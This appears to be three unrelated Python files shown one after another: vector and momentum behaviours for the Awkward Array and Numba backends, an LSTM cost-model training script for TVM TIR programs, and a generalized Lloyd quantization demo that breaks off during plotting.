class VectorRecord3D(VectorAwkward3D, ak.Record):
pass
behavior["Vector3D"] = VectorRecord3D
class VectorArray4D(VectorAwkward4D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
"""
Like ``np.ndarray.allclose``, but for VectorArray4D.
"""
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Vector4D"] = VectorArray4D
class VectorRecord4D(VectorAwkward4D, ak.Record):
pass
behavior["Vector4D"] = VectorRecord4D
class MomentumArray2D(MomentumAwkward2D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Momentum2D"] = MomentumArray2D
class MomentumRecord2D(MomentumAwkward2D, ak.Record):
pass
behavior["Momentum2D"] = MomentumRecord2D
class MomentumArray3D(MomentumAwkward3D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Momentum3D"] = MomentumArray3D
class MomentumRecord3D(MomentumAwkward3D, ak.Record):
pass
behavior["Momentum3D"] = MomentumRecord3D
class MomentumArray4D(MomentumAwkward4D, ak.Array):
def allclose(
self,
other: VectorProtocol,
rtol: ScalarCollection = 1e-05,
atol: ScalarCollection = 1e-08,
equal_nan: BoolCollection = False,
) -> BoolCollection:
return ak.all(self.isclose(other, rtol=rtol, atol=atol, equal_nan=equal_nan))
behavior["*", "Momentum4D"] = MomentumArray4D
class MomentumRecord4D(MomentumAwkward4D, ak.Record):
pass
behavior["Momentum4D"] = MomentumRecord4D
# NumPy functions, which also affect operator overloading #####################
behavior[numpy.absolute, "Vector2D"] = lambda v: v.rho
behavior[numpy.absolute, "Vector3D"] = lambda v: v.mag
behavior[numpy.absolute, "Vector4D"] = lambda v: v.tau
behavior[numpy.absolute, "Momentum2D"] = lambda v: v.rho
behavior[numpy.absolute, "Momentum3D"] = lambda v: v.mag
behavior[numpy.absolute, "Momentum4D"] = lambda v: v.tau
behavior[numpy.square, "Vector2D"] = lambda v: v.rho2
behavior[numpy.square, "Vector3D"] = lambda v: v.mag2
behavior[numpy.square, "Vector4D"] = lambda v: v.tau2
behavior[numpy.square, "Momentum2D"] = lambda v: v.rho2
behavior[numpy.square, "Momentum3D"] = lambda v: v.mag2
behavior[numpy.square, "Momentum4D"] = lambda v: v.tau2
behavior[numpy.sqrt, "Vector2D"] = lambda v: v.rho2 ** 0.25
behavior[numpy.sqrt, "Vector3D"] = lambda v: v.mag2 ** 0.25
behavior[numpy.sqrt, "Vector4D"] = lambda v: v.tau2 ** 0.25
behavior[numpy.sqrt, "Momentum2D"] = lambda v: v.rho2 ** 0.25
behavior[numpy.sqrt, "Momentum3D"] = lambda v: v.mag2 ** 0.25
behavior[numpy.sqrt, "Momentum4D"] = lambda v: v.tau2 ** 0.25
behavior[numpy.cbrt, "Vector2D"] = lambda v: v.rho2 ** 0.16666666666666666
behavior[numpy.cbrt, "Vector3D"] = lambda v: v.mag2 ** 0.16666666666666666
behavior[numpy.cbrt, "Vector4D"] = lambda v: v.tau2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum2D"] = lambda v: v.rho2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum3D"] = lambda v: v.mag2 ** 0.16666666666666666
behavior[numpy.cbrt, "Momentum4D"] = lambda v: v.tau2 ** 0.16666666666666666
behavior[numpy.power, "Vector2D", numbers.Real] = (
lambda v, expo: v.rho2 if expo == 2 else v.rho ** expo
)
behavior[numpy.power, "Vector3D", numbers.Real] = (
lambda v, expo: v.mag2 if expo == 2 else v.mag ** expo
)
behavior[numpy.power, "Vector4D", numbers.Real] = (
lambda v, expo: v.tau2 if expo == 2 else v.tau ** expo
)
behavior[numpy.power, "Momentum2D", numbers.Real] = (
lambda v, expo: v.rho2 if expo == 2 else v.rho ** expo
)
behavior[numpy.power, "Momentum3D", numbers.Real] = (
lambda v, expo: v.mag2 if expo == 2 else v.mag ** expo
)
behavior[numpy.power, "Momentum4D", numbers.Real] = (
lambda v, expo: v.tau2 if expo == 2 else v.tau ** expo
)
behavior["__cast__", VectorNumpy2D] = lambda v: vector.Array(v)
behavior["__cast__", VectorNumpy3D] = lambda v: vector.Array(v)
behavior["__cast__", VectorNumpy4D] = lambda v: vector.Array(v)
for left in (
"Vector2D",
"Vector3D",
"Vector4D",
"Momentum2D",
"Momentum3D",
"Momentum4D",
VectorObject2D,
VectorObject3D,
VectorObject4D,
):
for right in (
"Vector2D",
"Vector3D",
"Vector4D",
"Momentum2D",
"Momentum3D",
"Momentum4D",
VectorObject2D,
VectorObject3D,
VectorObject4D,
):
if not (isinstance(left, type) and isinstance(right, type)):
behavior[numpy.add, left, right] = lambda v1, v2: v1.add(v2)
behavior[numpy.subtract, left, right] = lambda v1, v2: v1.subtract(v2)
behavior[numpy.matmul, left, right] = lambda v1, v2: v1.dot(v2)
behavior[numpy.equal, left, right] = lambda v1, v2: v1.equal(v2)
behavior[numpy.not_equal, left, right] = lambda v1, v2: v1.not_equal(v2)
for name in (
"Vector2D",
"Vector3D",
"Vector4D",
"Momentum2D",
"Momentum3D",
"Momentum4D",
):
behavior[numpy.multiply, name, numbers.Real] = lambda v, factor: v.scale(factor)
behavior[numpy.multiply, numbers.Real, name] = lambda factor, v: v.scale(factor)
behavior[numpy.negative, name] = lambda v: v.scale(-1)
behavior[numpy.positive, name] = lambda v: v
behavior[numpy.true_divide, name, numbers.Real] = lambda v, denom: v.scale(
1 / denom
)
# class object cross-references ###############################################
VectorArray2D.ProjectionClass2D = VectorArray2D
VectorArray2D.ProjectionClass3D = VectorArray3D
VectorArray2D.ProjectionClass4D = VectorArray4D
VectorArray2D.GenericClass = VectorArray2D
VectorRecord2D.ProjectionClass2D = VectorRecord2D
VectorRecord2D.ProjectionClass3D = VectorRecord3D
VectorRecord2D.ProjectionClass4D = VectorRecord4D
VectorRecord2D.GenericClass = VectorRecord2D
MomentumArray2D.ProjectionClass2D = MomentumArray2D
MomentumArray2D.ProjectionClass3D = MomentumArray3D
MomentumArray2D.ProjectionClass4D = MomentumArray4D
MomentumArray2D.GenericClass = VectorArray2D
MomentumRecord2D.ProjectionClass2D = MomentumRecord2D
MomentumRecord2D.ProjectionClass3D = MomentumRecord3D
MomentumRecord2D.ProjectionClass4D = MomentumRecord4D
MomentumRecord2D.GenericClass = VectorRecord2D
VectorArray3D.ProjectionClass2D = VectorArray2D
VectorArray3D.ProjectionClass3D = VectorArray3D
VectorArray3D.ProjectionClass4D = VectorArray4D
VectorArray3D.GenericClass = VectorArray3D
VectorRecord3D.ProjectionClass2D = VectorRecord2D
VectorRecord3D.ProjectionClass3D = VectorRecord3D
VectorRecord3D.ProjectionClass4D = VectorRecord4D
VectorRecord3D.GenericClass = VectorRecord3D
MomentumArray3D.ProjectionClass2D = MomentumArray2D
MomentumArray3D.ProjectionClass3D = MomentumArray3D
MomentumArray3D.ProjectionClass4D = MomentumArray4D
MomentumArray3D.GenericClass = VectorArray3D
MomentumRecord3D.ProjectionClass2D = MomentumRecord2D
MomentumRecord3D.ProjectionClass3D = MomentumRecord3D
MomentumRecord3D.ProjectionClass4D = MomentumRecord4D
MomentumRecord3D.GenericClass = VectorRecord3D
VectorArray4D.ProjectionClass2D = VectorArray2D
VectorArray4D.ProjectionClass3D = VectorArray3D
VectorArray4D.ProjectionClass4D = VectorArray4D
VectorArray4D.GenericClass = VectorArray4D
VectorRecord4D.ProjectionClass2D = VectorRecord2D
VectorRecord4D.ProjectionClass3D = VectorRecord3D
VectorRecord4D.ProjectionClass4D = VectorRecord4D
VectorRecord4D.GenericClass = VectorRecord4D
MomentumArray4D.ProjectionClass2D = MomentumArray2D
MomentumArray4D.ProjectionClass3D = MomentumArray3D
MomentumArray4D.ProjectionClass4D = MomentumArray4D
MomentumArray4D.GenericClass = VectorArray4D
MomentumRecord4D.ProjectionClass2D = MomentumRecord2D
MomentumRecord4D.ProjectionClass3D = MomentumRecord3D
MomentumRecord4D.ProjectionClass4D = MomentumRecord4D
MomentumRecord4D.GenericClass = VectorRecord4D
# implementation of behaviors in Numba ########################################
def _aztype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
import numba
cls: typing.Union[
typing.Type[AzimuthalObjectXY],
typing.Type[AzimuthalObjectRhoPhi],
]
x_index = None
y_index = None
rho_index = None
phi_index = None
if is_momentum:
try:
x_index = recordarraytype.recordlookup.index("px")
except ValueError:
x_index = None
if x_index is None:
try:
x_index = recordarraytype.recordlookup.index("x")
except ValueError:
x_index = None
if is_momentum:
try:
y_index = recordarraytype.recordlookup.index("py")
except ValueError:
y_index = None
if y_index is None:
try:
y_index = recordarraytype.recordlookup.index("y")
except ValueError:
y_index = None
if is_momentum:
try:
rho_index = recordarraytype.recordlookup.index("pt")
except ValueError:
rho_index = None
if rho_index is None:
try:
rho_index = recordarraytype.recordlookup.index("rho")
except ValueError:
rho_index = None
try:
phi_index = recordarraytype.recordlookup.index("phi")
except ValueError:
phi_index = None
if x_index is not None and y_index is not None:
coord1 = recordarraytype.contenttypes[x_index].arraytype.dtype
coord2 = recordarraytype.contenttypes[y_index].arraytype.dtype
cls = AzimuthalObjectXY
elif rho_index is not None and phi_index is not None:
coord1 = recordarraytype.contenttypes[rho_index].arraytype.dtype
coord2 = recordarraytype.contenttypes[phi_index].arraytype.dtype
cls = AzimuthalObjectRhoPhi
elif is_momentum:
raise numba.TypingError(
f"{recordarraytype} is missing azimuthal fields: px/py (x/y) or pt/phi (rho/phi)"
)
else:
raise numba.TypingError(
f"{recordarraytype} is missing azimuthal fields: x/y or rho/phi"
)
return numba.typeof(cls(coord1.cast_python_value(0), coord2.cast_python_value(0)))
def _ltype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
import numba
cls: typing.Union[
typing.Type[LongitudinalObjectZ],
typing.Type[LongitudinalObjectTheta],
typing.Type[LongitudinalObjectEta],
]
z_index = None
theta_index = None
eta_index = None
if is_momentum:
try:
z_index = recordarraytype.recordlookup.index("pz")
except ValueError:
z_index = None
if z_index is None:
try:
z_index = recordarraytype.recordlookup.index("z")
except ValueError:
z_index = None
try:
theta_index = recordarraytype.recordlookup.index("theta")
except ValueError:
theta_index = None
try:
eta_index = recordarraytype.recordlookup.index("eta")
except ValueError:
eta_index = None
if z_index is not None:
coord1 = recordarraytype.contenttypes[z_index].arraytype.dtype
cls = LongitudinalObjectZ
elif theta_index is not None:
coord1 = recordarraytype.contenttypes[theta_index].arraytype.dtype
cls = LongitudinalObjectTheta
elif eta_index is not None:
coord1 = recordarraytype.contenttypes[eta_index].arraytype.dtype
cls = LongitudinalObjectEta
elif is_momentum:
raise numba.TypingError(
f"{recordarraytype} is missing longitudinal fields: pz (z) or theta or eta"
)
else:
raise numba.TypingError(
f"{recordarraytype} is missing longitudinal fields: z or theta or eta"
)
return numba.typeof(cls(coord1.cast_python_value(0)))
def _ttype_of(recordarraytype: typing.Any, is_momentum: bool) -> typing.Any:
import numba
cls: typing.Union[
typing.Type[TemporalObjectT],
typing.Type[TemporalObjectTau],
]
t_index = None
tau_index = None
if is_momentum:
try:
t_index = recordarraytype.recordlookup.index("E")
except ValueError:
t_index = None
if is_momentum and t_index is None:
try:
t_index = recordarraytype.recordlookup.index("e")
except ValueError:
t_index = None
if is_momentum and t_index is None:
try:
t_index = recordarraytype.recordlookup.index("energy")
except ValueError:
t_index = None
if t_index is None:
try:
t_index = recordarraytype.recordlookup.index("t")
except ValueError:
t_index = None
if is_momentum:
try:
tau_index = recordarraytype.recordlookup.index("M")
except ValueError:
tau_index = None
if is_momentum and tau_index is None:
try:
tau_index = recordarraytype.recordlookup.index("m")
except ValueError:
tau_index = None
if is_momentum and tau_index is None:
try:
tau_index = recordarraytype.recordlookup.index("mass")
except ValueError:
tau_index = None
if tau_index is None:
try:
tau_index = recordarraytype.recordlookup.index("tau")
except ValueError:
tau_index = None
if t_index is not None:
coord1 = recordarraytype.contenttypes[t_index].arraytype.dtype
cls = TemporalObjectT
elif tau_index is not None:
coord1 = recordarraytype.contenttypes[tau_index].arraytype.dtype
cls = TemporalObjectTau
elif is_momentum:
raise numba.TypingError(
f"{recordarraytype} is missing temporal fields: E/e/energy (t) or M/m/mass (tau)"
)
else:
raise numba.TypingError(
f"{recordarraytype} is missing temporal fields: t or tau"
)
return numba.typeof(cls(coord1.cast_python_value(0)))
def _numba_typer_Vector2D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
# These clearly exist, a bug somewhere, but ignoring them for now
return vector._backends.numba_object.VectorObject2DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, False)
)
def _numba_typer_Vector3D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
return vector._backends.numba_object.VectorObject3DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, False),
_ltype_of(viewtype.arrayviewtype.type, False),
)
def _numba_typer_Vector4D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
return vector._backends.numba_object.VectorObject4DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, False),
_ltype_of(viewtype.arrayviewtype.type, False),
_ttype_of(viewtype.arrayviewtype.type, False),
)
def _numba_typer_Momentum2D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
return vector._backends.numba_object.MomentumObject2DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, True)
)
def _numba_typer_Momentum3D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
return vector._backends.numba_object.MomentumObject3DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, True),
_ltype_of(viewtype.arrayviewtype.type, True),
)
def _numba_typer_Momentum4D(viewtype: typing.Any) -> typing.Any:
import vector._backends.numba_object
return vector._backends.numba_object.MomentumObject4DType( # type: ignore
_aztype_of(viewtype.arrayviewtype.type, True),
_ltype_of(viewtype.arrayviewtype.type, True),
_ttype_of(viewtype.arrayviewtype.type, True),
)
def _numba_lower(
context: typing.Any, builder: typing.Any, sig: typing.Any, args: typing.Any
) -> typing.Any:
from vector._backends.numba_object import ( # type: ignore
_awkward_numba_E,
_awkward_numba_e,
_awkward_numba_energy,
_awkward_numba_eta,
_awkward_numba_M,
_awkward_numba_m,
_awkward_numba_mass,
_awkward_numba_ptphi,
_awkward_numba_pxpy,
_awkward_numba_pxy,
_awkward_numba_pz,
_awkward_numba_rhophi,
_awkward_numba_t,
_awkward_numba_tau,
_awkward_numba_theta,
_awkward_numba_xpy,
_awkward_numba_xy,
_awkward_numba_z,
)
vectorcls = sig.return_type.instance_class
fields = sig.args[0].arrayviewtype.type.recordlookup
if issubclass(vectorcls, (VectorObject2D, VectorObject3D, VectorObject4D)):
if issubclass(sig.return_type.azimuthaltype.instance_class, AzimuthalXY):
if "x" in fields and "y" in fields:
azimuthal = _awkward_numba_xy
elif "x" in fields and "py" in fields:
azimuthal = _awkward_numba_xpy
elif "px" in fields and "y" in fields:
azimuthal = _awkward_numba_pxy
elif "px" in fields and "py" in fields:
azimuthal = _awkward_numba_pxpy
else:
raise AssertionError
elif issubclass(sig.return_type.azimuthaltype.instance_class, AzimuthalRhoPhi):
if "rho" in fields and "phi" in fields:
azimuthal = _awkward_numba_rhophi
elif "pt" in fields and "phi" in fields:
azimuthal = _awkward_numba_ptphi
else:
raise AssertionError
if issubclass(vectorcls, (VectorObject3D, VectorObject4D)):
if issubclass(sig.return_type.longitudinaltype.instance_class, LongitudinalZ):
if "z" in fields:
longitudinal = _awkward_numba_z
elif "pz" in fields:
longitudinal = _awkward_numba_pz
else:
raise AssertionError
elif issubclass(
sig.return_type.longitudinaltype.instance_class, LongitudinalTheta
):
longitudinal = _awkward_numba_theta
elif issubclass(
sig.return_type.longitudinaltype.instance_class, LongitudinalEta
):
longitudinal = _awkward_numba_eta
if issubclass(vectorcls, VectorObject4D):
if issubclass(sig.return_type.temporaltype.instance_class, TemporalT):
if "t" in fields:
temporal = _awkward_numba_t
elif "E" in fields:
temporal = _awkward_numba_E
elif "e" in fields:
temporal = _awkward_numba_e
elif "energy" in fields:
temporal = _awkward_numba_energy
else:
raise AssertionError
elif issubclass(sig.return_type.temporaltype.instance_class, TemporalTau):
if "tau" in fields:
temporal = _awkward_numba_tau
elif "M" in fields:
temporal = _awkward_numba_M
elif "m" in fields:
temporal = _awkward_numba_m
elif "mass" in fields:
temporal = _awkward_numba_mass
else:
raise AssertionError
if issubclass(vectorcls, VectorObject2D):
def impl(record: typing.Any) -> typing.Any:
return vectorcls(azimuthal(record))
elif issubclass(vectorcls, VectorObject3D):
def impl(record: typing.Any) -> typing.Any:
return vectorcls(azimuthal(record), longitudinal(record))
elif issubclass(vectorcls, VectorObject4D):
def impl(record: typing.Any) -> typing.Any:
return vectorcls(azimuthal(record), longitudinal(record), temporal(record))
return context.compile_internal(builder, impl, sig, args)
ak.behavior["__numba_typer__", "Vector2D"] = _numba_typer_Vector2D
ak.behavior["__numba_typer__", "Vector3D"] = _numba_typer_Vector3D
ak.behavior["__numba_typer__", "Vector4D"] = _numba_typer_Vector4D
ak.behavior["__numba_typer__", "Momentum2D"] = _numba_typer_Momentum2D
ak.behavior["__numba_typer__", "Momentum3D"] = _numba_typer_Momentum3D
ak.behavior["__numba_typer__", "Momentum4D"] = _numba_typer_Momentum4D
ak.behavior["__numba_lower__", "Vector2D"] = _numba_lower
ak.behavior["__numba_lower__", "Vector3D"] = _numba_lower
ak.behavior["__numba_lower__", "Vector4D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum2D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum3D"] = _numba_lower
ak.behavior["__numba_lower__", "Momentum4D"] = _numba_lower
|
<gh_stars>0
import tvm
from tir_dataset import TIRPrograms
import sqlite3_dataset
import torch
from torch import nn
from torch.utils.data import DataLoader
import torch.optim as optim
import torch.autograd.profiler as profiler
import numpy as np
import cProfile
device = torch.device("cuda")
class TokenEmbedding(nn.Module):
def __init__(self):
super(TokenEmbedding, self).__init__()
self.embedding_dim = 179
self.builtin_embedding = nn.Embedding(122, self.embedding_dim, device=device)
self.variable_embedding = nn.Embedding(
10000, self.embedding_dim, device=device
) # max 100 variables?
def forward(self, tokens):
out = torch.zeros(tokens.shape[0], self.embedding_dim + 1, device=device)
is_builtin = tokens[:, 1] == 0
out[is_builtin, : self.embedding_dim] = self.builtin_embedding(tokens[is_builtin, 0])
out[is_builtin, self.embedding_dim] = -1
is_variable = tokens[:, 1] == 1
out[is_variable, : self.embedding_dim] = self.variable_embedding(tokens[is_variable, 0])
out[is_variable, self.embedding_dim] = -1
is_number = tokens[:, 1] == 1
out[is_number, : self.embedding_dim] = 0
out[is_number, self.embedding_dim] = tokens[is_number, 0].float()
return out
class LSTMPredictor(nn.Module):
def __init__(self):
super(LSTMPredictor, self).__init__()
self.token_embedding = TokenEmbedding()
self.hidden_stmt_size = 180
self.hidden_loop_size = 180
self.stmt_reducer = nn.LSTM(
self.token_embedding.embedding_dim + 1, self.hidden_stmt_size, device=device
)
self.stmt_ff = nn.Sequential(nn.Linear(180, 180), nn.ELU())
self.loop_reducer = nn.LSTM(
self.token_embedding.embedding_dim + 1, self.hidden_loop_size, device=device
)
self.loop_ff = nn.Sequential(nn.Linear(180, 180), nn.ELU())
self.tokenize_fn = tvm.get_global_func("tir.analysis.tokenize_stmt")()
self.ff_final = nn.Sequential(
nn.Linear(180, 90),
nn.ELU(),
nn.Linear(90, 1),
)
def tokenize(self, ast):
return self.tokenize_fn(ast).asnumpy()
def tokenize_for(self, f):
# TODO: missing for kind
tokens = np.concatenate(
[self.tokenize(f.min), self.tokenize(f.extent), self.tokenize(f.loop_var)]
)
return self.token_embedding(torch.as_tensor(tokens, device=next(self.parameters()).device))
def visit(self, ast):
if isinstance(ast, tvm.tir.stmt.For):
children = self.visit(ast.body)
embedded = self.tokenize_for(ast)
y, hidden = self.loop_reducer(embedded.view(embedded.shape[0], 1, embedded.shape[1]))
y = hidden[0]
for x in children:
y, hidden = self.loop_reducer(x.view(x.shape[0], 1, -1), hidden)
x = self.loop_ff(hidden[0])
return x
if isinstance(ast, tvm.tir.stmt.Allocate):
# TODO: include this information?
return self.visit(ast.body)
if isinstance(ast, tvm.tir.stmt.AttrStmt):
# TODO: include this information?
return self.visit(ast.body)
if isinstance(ast, tvm.tir.stmt.SeqStmt):
return [self.visit(x) for x in ast.seq]
embedded = self.token_embedding(
torch.as_tensor(self.tokenize(ast), device=next(self.parameters()).device)
)
out, hidden = self.stmt_reducer(embedded.view(embedded.shape[0], 1, embedded.shape[1]))
x = self.stmt_ff(out)
return x
def forward(self, ast):
x = self.visit(ast.body)
# TODO: figure out a better way to handle this
if isinstance(x, list):
y = None
hidden = (
torch.zeros(1, 1, self.hidden_loop_size, device=device),
torch.zeros(1, 1, self.hidden_loop_size, device=device),
)
for z in x:
y, hidden = self.loop_reducer(z, hidden)
return self.ff_final(y.reshape(-1, self.hidden_loop_size))
return self.ff_final(x.reshape(-1, self.hidden_loop_size))
def train(model):
dataset = sqlite3_dataset.TIRPrograms(
"dataset_cpu.db", "dataset_cpu/network_info/all_tasks.pkl"
)
loss = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=1e-4)
batch_size = 16
for epoch in range(50):
for i, ((target, tir), cost) in enumerate(dataset.iterate()):
if i % batch_size == 0:
optimizer.zero_grad()
predicted_cost = model(tir)
d = loss(predicted_cost, torch.tensor([[cost]], dtype=torch.float32, device=device))
print(f"{i:10}{predicted_cost[0,0,0]:10.2e}{cost:10.2e}{d.item():10.2e}")
d.backward()
if i % batch_size == batch_size - 1:
optimizer.step()
# if i % 100 == 0:
# with torch.no_grad():
# (target, tir), cost = dataset[0]
# predicted_cost = model(tir)
# print(predicted_cost, cost)
class SingleLayerLSTM(nn.Module):
def __init__(self):
super(SingleLayerLSTM, self).__init__()
self.embedding = TokenEmbedding()
self.lstm = nn.LSTM(180, 180)
self.ff = nn.Sequential(
nn.Linear(180, 80),
nn.ELU(),
nn.Linear(80, 1),
)
self.tokenize_fn = tvm.get_global_func("tir.analysis.tokenize_stmt")()
def forward(self, ast):
tks = self.tokenize_fn(ast.body).asnumpy()
embedded = self.embedding(torch.as_tensor(tks, device=device))
out, hidden = self.lstm(embedded.view(-1, 1, embedded.shape[1]))
return self.ff(hidden[0])
if __name__ == "__main__":
# progs = TIRPrograms("dataset_cpu/network_info/all_tasks.pkl", "dataset_cpu/measure_records")
# (target, tir), cost = progs[0]
# import pickle
# tir = pickle.load(open("tir_program.pkl", "rb"))
# model = LSTMPredictor()
# print(model(tir))
# model = LSTMPredictor().cuda()
model = SingleLayerLSTM().cuda()
train(model)
|
<filename>generalized_lloyd_quantization/demo-dict.py
import os
import time
import pickle
import torch
import numpy as np
from matplotlib import pyplot as plt
from null_uniform import compute_quantization as uni
from generalized_lloyd_LBG import compute_quantization as gl
from optimal_generalized_lloyd_LBG import compute_quantization as opt_gl_numpy
from optimal_generalized_lloyd_LBG import calculate_assignment_probabilites
from optimal_generalized_lloyd_LBG_torch import compute_quantization as opt_gl_torch
from utils.clustering import get_clusters
from analysis_transforms import fista
dict_file = '../../../data/sc_dictionary_8x8_lamda0point1_Field.p'
data_file = '../../../data/two_million_unwhite_centered_patches_8x8.p'
# Parameters for FISTA
patch_dimensions = (8, 8)
sparsity_param = 0.1
fista_device = 'cuda:1'
torch.cuda.set_device(1)
patch_dataset = pickle.load(open(data_file, 'rb'))
zero_mean_patches = np.transpose(
patch_dataset['batched_patches'], (0, 2, 1)).reshape(
(-1, patch_dimensions[0]*patch_dimensions[1])).T
img_patch_comp_means = patch_dataset['original_patch_means']
sc_dictionary = pickle.load(open(dict_file, 'rb'))
print('running FISTA')
raw_sc_codes = fista.run(
torch.from_numpy(zero_mean_patches).to(fista_device),
torch.from_numpy(sc_dictionary).to(fista_device), sparsity_param, 1000).cpu().numpy()
#^ now samples index first dim, code coefficients in second dim
print('done')
torch.cuda.empty_cache()
Y = zero_mean_patches.T #(d,n)
A = sc_dictionary # (n,n)
X = raw_sc_codes.T # (d,n)
# Note: Y.T = A@X.T
# Use only some X
X = X[:50000]
# Parameters for quant-computation
quant_method = 'opt_lloyd'
lagrange_mult = 1.
num_bins = 40
num_clusters = 60
clustering_algo = 'stoer_wagner'
quant_device = 'numpy'
# torch.cuda.set_device(1)
def compute_quantization_wrapper(data, quant_method='uni', clusters=None,
binwidth=1, placement_scheme='on_mean',
lagrange_mult=1., nn_method='brute_break',
device='cpu'):
"""
Parameters
data: ndarray (d,n)
quant_method: str {'uni', 'lloyd', 'opt_lloyd'}
clusters: [cluster1, cluster2, ...] where cluster1 = [idx_1, idx_2, ...]
binwidth: float or ndarray(n)
placement_scheme: str {'on_mode', 'on_median', 'on_mean', 'on_zero'}
lagrange_mult: float
nn_method: str {'brute_np', 'brute_scipy', 'brute_break', 'kdtree'}
device: str {'numpy', 'cpu', 'cuda', ...}
Returns
a_pts, c_ass, MSE, rate
"""
data_dim = data.shape[1]
if clusters is None:
clusters = [list(range(data_dim))]
if isinstance(binwidth, np.ndarray):
assert(binwidth.shape == (data_dim,))
else:
binwidth = np.array([float(binwidth)]*data_dim)
a_pts_all = []
c_ass_all = []
MSE_total = 0
rate_total = 0
for cluster in clusters:
cluster_dim = len(cluster)
Xc = data[:,cluster]
binwidth_c = binwidth[cluster]
print('cluster of size {}:'.format(cluster_dim),cluster)
if quant_method=='uni':
a_pts, c_ass, MSE, rate = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
elif quant_method=='lloyd':
init_apts, _, _, _ = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
a_pts, c_ass, MSE, rate = gl(Xc, init_apts, force_const_num_assignment_pts=False)
elif quant_method=='opt_lloyd':
init_apts, _, _, _ = uni(Xc, binwidth_c, placement_scheme=placement_scheme)
init_cword_len = (-1. * np.log2(1. / len(init_apts)) *np.ones((len(init_apts),)))
if device=='numpy':
a_pts, c_ass, MSE, rate = opt_gl_numpy(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
nn_method=nn_method)
else:
try:
a_pts, c_ass, MSE, rate = opt_gl_torch(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
nn_method=nn_method, device=device)
except RuntimeError as e:
# Cuda mem error; Use numpy
print("Runtime error: {}".format(e))
print("Switching to numpy")
a_pts, c_ass, MSE, rate = opt_gl_numpy(Xc, init_apts, init_cword_len, lagrange_mult=lagrange_mult,
nn_method=nn_method)
else:
raise ValueError("Invalid quant_method {}".format(quant_method))
print('MSE', MSE, 'rate', rate)
a_pts_all.append(a_pts)
c_ass_all.append(c_ass)
MSE_total += MSE
rate_total += rate
return a_pts_all, c_ass_all, MSE_total, rate_total
clusters = get_clusters(A, num_clusters, algo=clustering_algo)
binwidths = X.ptp(axis=0)/num_bins
a_pts_all, c_ass_all, MSE, rate = compute_quantization_wrapper(X,clusters=clusters,quant_method=quant_method,
binwidth=binwidths, device=quant_device, lagrange_mult=lagrange_mult)
print('MSE',MSE)
print('rate',rate)
ass_probs_all = []
codeword_lengths = []
# Compute codeword lengths and assignment_probablities
for i in range(len(clusters)):
a_pts = a_pts_all[i]
c_ass = c_ass_all[i]
probs = calculate_assignment_probabilites(c_ass, len(a_pts))
ass_probs_all.append(probs)
codeword_lengths.append(-1 * np.log2(probs))
# Save to disk
quantization_data = {
'quant_method':quant_method,
'dimension':X.shape[1],
'clusters':clusters,
'assignment_points':a_pts_all,
'codeword_lengths':codeword_lengths,
'trained_on': {
'dict_file':os.path.basename(dict_file),
'data_file':os.path.basename(data_file),
'num_bins':num_bins,
'binwidths':binwidths,
'codes_assigned':c_ass_all,
'clustering_algo':clustering_algo,
'lagrange_mult':lagrange_mult,
'MSE':MSE,
'rate':rate
}
}
if quant_method != 'uni':
quantization_code_file = 'quant_codes/quantization_code__{}D__{}__{}_{}_clusters__{}bins__{}MSE__{}RATE.p'.format(X.shape[1], quant_method, num_clusters, clustering_algo, num_bins, MSE, rate)
else:
quantization_code_file = 'quant_codes/quantization_code__{}D__{}__{}_{}_clusters__{}bins__{}lambda__{}MSE__{}RATE.p'.format(X.shape[1], quant_method, num_clusters, clustering_algo, num_bins, lagrange_mult, MSE, rate)
pickle.dump(quantization_data, open(quantization_code_file, 'wb'))
# Plotting...
num_clusters = len(clusters)
code_sizes = [a_pts.shape[0] for a_pts in a_pts_all]
max_codesize = max(code_sizes)
ass_probs_heatmap = np.zeros((max_codesize,num_clusters))
ass_probs_heatmap.fill(np.nan)
for i in range(num_clusters):
ass_probs_heatmap[:code_sizes[i],i] = ass_probs_all[i]
c_ass_ndarray = np.array(c_ass_all).T
for _ in range(2):
# Overlay probablity heatmap with code
random_data_pt = np.random.randint(0,X.shape[0])
data_img = (Y[random_data_pt] + img_patch_comp_means).reshape(patch_dimensions)
data_sc = X[random_data_pt]
data_sc_clustered = [np.linalg.norm(data_sc[cluster]) for cluster in clusters]
data_code = c_ass_ndarray[random_data_pt]
fig = plt.figure(figsize=(15,8))
plt.imshow(ass_probs_heatmap, cmap='hot', interpolation='nearest')
plt.colorbar()
plt.title("Visualizing random data-point #{}".format(random_data_pt))
plt.plot(c_ass_ndarray[random_data_pt],'ro', color = 'b')
plt.plot(data_sc_clustered,color = 'r', linestyle='-',linewidth = 1)
